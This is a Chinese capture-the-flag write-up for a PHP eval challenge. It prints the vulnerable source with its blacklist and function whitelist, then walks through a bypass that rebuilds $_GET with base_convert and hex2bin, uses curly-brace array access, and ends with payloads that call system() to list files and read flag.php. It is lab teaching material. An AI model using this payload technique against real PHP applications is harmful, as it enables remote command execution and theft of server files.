信息收集
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){show_source(__FILE__);
}else{//例子 c=20-1$content = $_GET['c'];// 长度不允许超过80个字符if (strlen($content) >= 80) {die("太长了不会算");}// 设置字符黑名单,以下字符不允许出现在content中$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];foreach ($blacklist as $blackitem) {if (preg_match('/' . $blackitem . '/m', $content)) {die("请不要输入奇奇怪怪的字符");}}// 设置白名单,只允许以下单词出现在content中//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];// 这里匹配的是变量名,这和平时编程时变量命名规则类似,第一个[],以大小写字母或者\x7f-\xff开头,第二个[],存在0-n个规则内的字符,也就是说a?bc会被匹配上a和bcpreg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs); // 匹配正则的字符会在这里进行白名单过滤,也就是说不是变量单词类的东西就不会在这里被过滤了foreach ($used_funcs[0] as $func) {if (!in_array($func, $whitelist)) {die("请不要输入奇奇怪怪的函数");}}//帮你算出答案eval('echo '.$content.';');
}
白名单中有base_convert decbin hexdec,也许可以加以利用
解题
使用了之前写的脚本,构造与或非,都失败了,主要是限制了0x7f-0xff字符的使用
base_convert(number, frombase, tobase)
number:要转换的数字。
frombase:数字原来的进制。
tobase:要转换到的进制。
return: 转化后的数值decbin(dec_number)
dec_number:需要转化成2进制的10进制数
return: 转化后的数值dechex(dec_number)
dec_number:需要转化成16进制的10进制数
return: 转化后的数值hex2bin(hex_number)
dec_number:需要转化成ASCII码的16进制数
return: 转化后的字符串
使用base_convert构造,但是内容不能太长
我们尝试构造一个$_GET[a],这样就能绕过它的检测了,可是_GET和a都不在白名单里,过不了白名单验证
我试了一下decbin,转化后是二进制,不是我们想要的字符串,所以不满足条件
得使用hex2bin,这样能转化出字符串
_GET构造
<?php
echo base_convert("hex2bin",36,10).'\n'; //37907361743
echo base_convert(37907361743,10,36).'\n'; //hex2binecho bin2hex("_GET").'\n'; //5f474554
echo hexdec(bin2hex("_GET")).'\n'; //1598506324
echo decbin(1598506324).'\n'; //1011111010001110100010101010100
echo hex2bin("5f474554").'\n'; //_GET
echo hex2bin(dechex(1598506324)).'\n'; //_GET
?>
使用base_convert的36进制转10进制,是因为36进制包含0-9a-z
所以最后
base_convert(37907361743,10,36)(dechex(1598506324))
⇒ hex2bin(dechex(1598506324))
⇒ _GET
这样构造的函数为什么能够执行,因为,PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数,函数表在内的一些用途。
详细可以看:php: 可变函数这篇文章
至此,我们仅拿到了_GET的合法构造
利用_GET
$$a相当于 $($a) $a被解析成了字符串并与前面的 重新组成了变量,所以 ‘ 重新组成了变量,所以` 重新组成了变量,所以‘$a ⇒ $apple`
<?php
$a = "apple"; // 普通变量
$$a = "banana"; // 等价于 $apple = "banana"
echo $a; //apple
echo $apple; //banana
echo $$a; //banana
?>
由于我们不能使用白名单之外的单词,所以我们随意选一个做变量名,但要尽可能短,毕竟限制了只能输入80个字符
例如:
$pi=base_convert(37907361743,10,36)(dechex(1598506324))
⇒ $pi = "_GET"
⇒ $$pi = $_GET
绕过中括号
仅 php_version < php7.4可实现
题目的版本在当前时间段版本是7.3.11
$data = ['name' => 'apple'];
echo $data['name'];
echo $data{name};
所以可以通过$_GET{key}绕过中括号
构造payload
$_GET{cmd}
这里cmd不在白名单内所以不能使用,我们找一个白名单里短一点的单词,最好不是关键字,关键字可能会引发不必要的麻烦
⇒ $_GET{sin}
把之前的$_GET翻译过来
⇒ $pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{sin}&sin=system('ls');
这还不够,因为sin = system('ls'),但是单引号被过滤了,所以我们折中一下
⇒ $pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{sin}($$pi{cos})&sin=system&cos=ls
最终答案:
?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{sin}($$pi{cos})&sin=system&cos=ls
?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{sin}($$pi{cos})&sin=system&cos=tac flag.php
web122 目录 web78
N问N答(如何绘制一个没有背景的矩形框;如何绘制一个没有背景的矩形框))
之后端篇)
